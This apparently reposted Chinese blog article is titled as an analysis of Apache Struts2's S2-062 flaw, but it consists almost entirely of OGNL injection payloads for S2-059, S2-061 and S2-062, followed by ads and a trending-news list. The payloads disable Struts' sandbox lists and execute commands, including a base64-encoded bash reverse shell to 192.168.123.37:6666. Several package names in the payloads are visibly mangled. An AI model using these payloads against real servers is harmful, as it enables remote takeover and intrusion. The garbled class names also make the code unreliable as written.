S2-062漏洞原理分析
>>>> S2-059
payload1=%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance( .opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}
payload2=%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess( .OgnlContext )).( .lang.Runtime ().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMy4zNy82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}'))}
>>>> S2-061
payload=%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("whoami")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
>>>> S2-062
payload=(#request.map=#BeanMap@{}).toString().substring(0,0) + .apache.commons.collections.
(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +
(#request.map2=#BeanMap@{}).toString().substring(0,0) + .apache.commons.collections.
(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +
(#request.map3=#BeanMap@{}).toString().substring(0,0) + .apache.commons.collections.
(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedPackageNames',# .apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedClasses',# .apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMy4zNy82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}'}))
银河实验室
往期回顾
技术
技术
技术
技术
点赞、分享,感谢你的阅读▼
关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
关注网络尖刀微信公众号
随时掌握互联网精彩
随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 准确把握守正创新的辩证关系 7910321
- 2 中国黄金原董事长家搜出大量黄金 7988582
- 3 空调英文不会男生盯着考场空调看 7819664
- 4 消费品以旧换新“加速度” 7707620
- 5 被铁路售票员的手速惊到了 7620555
- 6 网红赤木刚宪爆改赵露思 7517054
- 7 县委原书记大搞“刷白墙”被通报 7416387
- 8 山姆代购在厕所分装蛋糕 7383130
- 9 马龙刘诗雯穿正装打混双 7290053
- 10 刘强东提前发年终奖 7174149